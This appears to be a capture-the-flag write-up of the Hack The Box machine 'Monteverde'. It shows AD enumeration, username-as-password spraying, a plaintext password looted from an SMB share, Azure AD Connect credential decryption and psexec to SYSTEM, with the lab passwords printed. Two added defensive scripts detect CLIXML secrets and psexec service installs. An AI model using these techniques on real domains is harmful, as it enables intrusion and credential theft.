HTB: Monteverde

Details

This machine is Monteverde from Hack The Box.

Recon

kali@kali:~$ nmap -sV -p- -Pn -T4 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 21:36 GMT
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 36.15% done; ETC: 21:39 (0:01:23 remaining)
Nmap scan report for 10.10.10.172
Host is up (0.024s latency).
Not shown: 65517 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-21 21:49:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/21%Time=5E504E12%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.19 seconds

So it is likely a domain controller for the domain megabank.local. I added this to my hosts file and ran enum4linux.

kali@kali:~$ enum4linux -a megabank.local
[SNIP]
===============================
|    Users on megabank.local    |
 ===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)
[SNIP]
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7
[SNIP]

User

So for users whose name was 7 or more characters, I tried the username as the password too.

kali@kali:~$ smbmap -H megabank.local -u SABatchJobs -p SABatchJobs
[+] Finding open SMB ports....
[+] User SMB session established on megabank.local...
[+] IP: megabank.local:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    ..
        azure_uploads                                           READ ONLY
        C$                                                      NO ACCESS       Default share
        E$                                                      NO ACCESS       Default share
        .
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-3ac-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-1f0-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-468-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    atsvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-6a4-0
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    wkssvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-290-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-290-1
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    RpcProxy\49673
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    3d1069c918f5e48c
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    RpcProxy\593
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    srvsvc
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    spoolss
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-b58-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    netdfs
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-27c-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    W32TIME_ALT
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    SQLLocal\MSSQLSERVER
        fr--r--r--                2 Sun Dec 31 23:58:45 1600    sql\query
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-bd4-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    CPFATP_5972_v4.0.30319
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PSHost.132267952149387128.5972.DefaultAppDomain.miiserver
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    GoogleCrashServices\S-1-5-18
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    GoogleCrashServices\S-1-5-18-x64
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-bc0-0
        IPC$                                                    READ ONLY       Remote IPC
        .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    ..
        NETLOGON                                                READ ONLY       Logon server share
        .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    .
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    ..
        dr--r--r--                0 Thu Jan  2 22:05:27 2020    MEGABANK.LOCAL
        SYSVOL                                                  READ ONLY       Logon server share
        .
        dr--r--r--                0 Fri Jan  3 13:12:48 2020    .
        dr--r--r--                0 Fri Jan  3 13:12:48 2020    ..
        dr--r--r--                0 Fri Jan  3 13:15:23 2020    dgalanos
        dr--r--r--                0 Fri Jan  3 13:41:18 2020    mhope
        dr--r--r--                0 Fri Jan  3 13:14:56 2020    roleary
        dr--r--r--                0 Fri Jan  3 13:14:28 2020    smorgan
        users$                                                  READ ONLY

So I connected to the users$ share with smbclient.

kali@kali:~$ smbclient //megabank.local/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \>

smb: \> ls
.                                   D        0  Fri Jan  3 13:12:48 2020
..                                  D        0  Fri Jan  3 13:12:48 2020
dgalanos                            D        0  Fri Jan  3 13:12:30 2020
mhope                               D        0  Fri Jan  3 13:41:18 2020
roleary                             D        0  Fri Jan  3 13:10:30 2020
smorgan                             D        0  Fri Jan  3 13:10:24 2020

            524031 blocks of size 4096. 519955 blocks available

smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

                524031 blocks of size 4096. 519955 blocks available

smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (4.7 KiloBytes/sec) (average 4.7 KiloBytes/sec)

I took a look at the file.

kali@kali:~$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

There is a password, and the directory was called mhope, so I tried it as that user's password.
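A defender's view of the same file: azure.xml is a PowerShell CLIXML export (Export-Clixml), and the two stray characters shown before <Objs> in the cat output are the UTF-16 byte-order mark that Export-Clixml writes by default. The scanner below is an added example, not code from the original write-up; it decodes such files by their BOM, walks every serialised object, and reports string properties whose names look like credentials, returning only the value's length so the report itself does not re-leak the secret. The SECRET_PROPS pattern and the sample file (with a placeholder in place of the real password) are constructed for the example.

```python
"""Scan PowerShell CLIXML (Export-Clixml) files on a share for serialised secrets.

Added example, not part of the original write-up. Handles the UTF-16/UTF-8 BOM,
then looks for <S N="Password"> style properties inside every <Obj>.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

CLIXML_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Property names that should never sit in plaintext on a file share.
# This pattern is an assumption for the example; extend it for your environment.
SECRET_PROPS = re.compile(r"password|secret|apikey|token", re.IGNORECASE)

# Constructed sample mirroring the shape of azure.xml, with a placeholder instead
# of the real password, encoded as UTF-16 with a BOM the way Export-Clixml does.
SAMPLE_CLIXML = (
    '<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">\n'
    '  <Obj RefId="0">\n'
    '    <TN RefId="0">\n'
    '      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>\n'
    '      <T>System.Object</T>\n'
    '    </TN>\n'
    '    <Props>\n'
    '      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>\n'
    '      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>\n'
    '      <S N="DisplayName">sync-app</S>\n'
    '      <S N="Password">EXAMPLE-PLACEHOLDER-PASSWORD</S>\n'
    '    </Props>\n'
    '  </Obj>\n'
    '</Objs>\n'
).encode("utf-16")  # the utf-16 codec prepends the BOM


def decode_clixml(raw: bytes) -> str:
    """Decode CLIXML bytes according to their BOM (UTF-16 LE/BE, UTF-8, or none)."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")        # the codec consumes the BOM
    elif raw[:3] == b"\xef\xbb\xbf":
        text = raw.decode("utf-8-sig")
    else:
        text = raw.decode("utf-8")
    # ElementTree rejects str input that still carries an encoding declaration.
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text)


def find_secret_props(raw: bytes) -> List[Tuple[str, str, int]]:
    """Return (type name, property name, value length) for each suspicious <S> property.

    The value itself is deliberately not returned, only its length.
    """
    root = ET.fromstring(decode_clixml(raw))
    ns = {"ps": CLIXML_NS}
    findings = []
    for obj in root.iter(f"{{{CLIXML_NS}}}Obj"):  # iter() also reaches nested objects
        type_el = obj.find("ps:TN/ps:T", ns)
        type_name = type_el.text if type_el is not None else "(unknown type)"
        for prop in obj.findall("ps:Props/ps:S", ns):
            name = prop.get("N", "")
            if SECRET_PROPS.search(name):
                findings.append((type_name, name, len(prop.text or "")))
    return findings


def scan_file(path: str) -> List[Tuple[str, str, int]]:
    """Scan one file pulled from a share (e.g. a copy of azure.xml)."""
    with open(path, "rb") as fh:
        return find_secret_props(fh.read())


if __name__ == "__main__":
    for type_name, prop, length in find_secret_props(SAMPLE_CLIXML):
        print(f"{type_name}: property {prop!r} holds a {length}-character plaintext value")
```

Run scan_file over everything readable on a share such as users$ and anything it reports is a credential that needs rotating as well as removing, since the file may already have been read.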

kali@kali:~$ smbmap -H megabank.local -u mhope -p '4n0therD4y@n0th3r$'
[+] Finding open SMB ports....
[+] User SMB session established on megabank.local...
[+] IP: megabank.local:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    .
        dr--r--r--                0 Fri Jan  3 12:43:36 2020    ..
        azure_uploads                                           READ ONLY
[SNIP]

It worked, so I tried Evil-WinRM.

kali@kali:~$ ./evil-winrm.rb -i megabank.local -u mhope -p '4n0therD4y@n0th3r$'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> 

Grab the user flag

*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
[REDACTED]

And onto system

System

*Evil-WinRM* PS C:\Users\mhope> dir

    Directory: C:\Users\mhope

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                .Azure
d-r---         1/3/2020   5:24 AM                3D Objects
d-r---         1/3/2020   5:24 AM                Contacts
d-r---         1/3/2020   5:47 AM                Desktop
d-r---         1/3/2020   5:24 AM                Documents
d-r---         1/3/2020   5:24 AM                Downloads
d-r---         1/3/2020   5:24 AM                Favorites
d-r---         1/3/2020   5:24 AM                Links
d-r---         1/3/2020   5:24 AM                Music
d-r---         1/3/2020   5:24 AM                Pictures
d-r---         1/3/2020   5:24 AM                Saved Games
d-r---         1/3/2020   5:24 AM                Searches
d-r---         1/3/2020   5:24 AM                Videos

The .Azure directory is not normally there.

*Evil-WinRM* PS C:\Users\mhope> cd .Azure
*Evil-WinRM* PS C:\Users\mhope\.Azure> dir

    Directory: C:\Users\mhope\.Azure

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                ErrorRecords
-a----         1/3/2020   5:31 AM             34 AzurePSDataCollectionProfile.json
-a----         1/3/2020   5:35 AM           2794 AzureRmContext.json
-a----         1/3/2020   5:31 AM            191 AzureRmContextSettings.json
-a----         1/3/2020   5:36 AM           7896 TokenCache.dat

This, combined with the contents of Program Files,

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:31 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0
d-----         1/2/2020   2:32 PM                Microsoft.NET
d-----         1/3/2020   5:28 AM                PackageManagement
d-----         1/2/2020   9:37 PM                VMware
d-r---         1/2/2020   2:46 PM                Windows Defender
d-----         1/2/2020   2:46 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----         1/2/2020   2:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         1/2/2020   2:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----         1/3/2020   5:28 AM                WindowsPowerShell

showed they were using Azure AD Sync and Azure AD Connect.

*Evil-WinRM* PS C:\Program Files> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

And I was in the Azure Admins group. I found an exploit for this at https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/, so I uploaded it and ran it.

*Evil-WinRM* PS C:\Users\mhope\Desktop> .\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

With the creds I used Impacket's psexec.py to log in.

kali@kali:~$ python3 psexec.py administrator:'d0m@in4dminyeah!'@megabank.local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on megabank.local.....
[*] Found writable share ADMIN$
[*] Uploading file UVqfUSAL.exe
[*] Opening SVCManager on megabank.local.....
[*] Creating service sAcH on megabank.local.....
[*] Starting service sAcH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32>whoami
nt authority\system
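The psexec.py output above is also a detection opportunity: a randomly named executable is written to ADMIN$ (which maps to %SystemRoot%) and a randomly named service is created to run it, and the Service Control Manager records every service install as System log event 7045. The detector below is an added example, not part of the original write-up. The EVENTS lines are constructed, simplified pipe-delimited renderings of the 7045 fields (ServiceName, ImagePath, ServiceType, StartType, AccountName) rather than real log format, and BASELINE_SERVICES stands in for a real per-host baseline; the service and file names in the first event are taken from the session above.

```python
"""Heuristic detection of psexec-style service installs in SCM event 7045.

Added example, not part of the original write-up. Flags a service install when
several independent signals line up: binary dropped directly in %SystemRoot%
(where ADMIN$ lands files), random-looking 8-letter binary name, random-looking
4-letter service name, and an on-demand LocalSystem service.
"""
import ntpath
import re
from typing import Dict, List

# Stand-in for a real per-host baseline of expected services.
BASELINE_SERVICES = {"ADSync", "MSSQLSERVER", "WinDefend", "VMTools"}

# The bare Windows root, i.e. the directory ADMIN$ points at.
SYSTEMROOT_RE = re.compile(r"^(%systemroot%|%windir%|[a-z]:\\windows)\\?$", re.IGNORECASE)

# Constructed events in a simplified "EventID|Host|Field=Value|..." form.
EVENTS = [
    r'7045|MONTEVERDE|ServiceName=sAcH|ImagePath=%systemroot%\UVqfUSAL.exe|ServiceType=user mode service|StartType=demand start|AccountName=LocalSystem',
    r'7045|MONTEVERDE|ServiceName=ADSync|ImagePath="C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"|ServiceType=user mode service|StartType=auto start|AccountName=MEGABANK\AAD_987d7f2f57d2',
    r'7045|MONTEVERDE|ServiceName=WinDefend|ImagePath="C:\Program Files\Windows Defender\MsMpEng.exe"|ServiceType=user mode service|StartType=auto start|AccountName=LocalSystem',
    r'7045|MONTEVERDE|ServiceName=VMTools|ImagePath="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"|ServiceType=user mode service|StartType=auto start|AccountName=LocalSystem',
    r'7036|MONTEVERDE|ServiceName=sAcH|State=running',  # a state change, not an install
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed event line into a field dictionary."""
    event_id, host, *fields = line.split("|")
    ev = {"EventID": event_id, "Host": host}
    for field in fields:
        key, _, value = field.partition("=")
        ev[key] = value
    return ev


def image_binary(image_path: str) -> str:
    """Extract the executable path from an ImagePath, quoted or with arguments."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:p.index('"', 1)]
    m = re.match(r"^(.*?\.exe)(\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p


def looks_random(name: str, length: int) -> bool:
    """Fixed-length, letters-only, mixed-case names with no separators."""
    return len(name) == length and name.isalpha() and not name.islower() and not name.isupper()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of suspicious traits found in a single 7045 event."""
    reasons: List[str] = []
    if ev.get("EventID") != "7045":
        return reasons
    directory, binary = ntpath.split(image_binary(ev.get("ImagePath", "")))
    if SYSTEMROOT_RE.match(directory):
        reasons.append("binary installed directly in %SystemRoot% (ADMIN$ root)")
    if looks_random(binary.rsplit(".", 1)[0], 8):
        reasons.append(f"random-looking 8-letter binary name {binary}")
    svc = ev.get("ServiceName", "")
    if svc not in BASELINE_SERVICES and looks_random(svc, 4):
        reasons.append(f"random-looking 4-letter service name {svc}")
    if (reasons and ev.get("StartType", "").lower() == "demand start"
            and ev.get("AccountName") == "LocalSystem"):
        reasons.append("on-demand LocalSystem service, consistent with one-shot remote exec")
    return reasons


def detect(lines: List[str], min_reasons: int = 2) -> Dict[str, List[str]]:
    """Map each flagged service name to the reasons it was flagged."""
    flagged: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            flagged[ev.get("ServiceName", "?")] = reasons
    return flagged


if __name__ == "__main__":
    for svc, reasons in detect(EVENTS).items():
        print(f"[!] service {svc}: " + "; ".join(reasons))
```

Requiring at least two signals keeps legitimate camel-case vendor binaries in Program Files from firing; the strongest single signal is a service binary sitting in the Windows root itself, since installers put theirs in System32 or Program Files.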

And grab the flag

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 6002-9F55

Directory of C:\Users\Administrator\Desktop

01/03/2020  05:48 AM    <DIR>          .
01/03/2020  05:48 AM    <DIR>          ..
01/03/2020  05:48 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,056,060,928 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
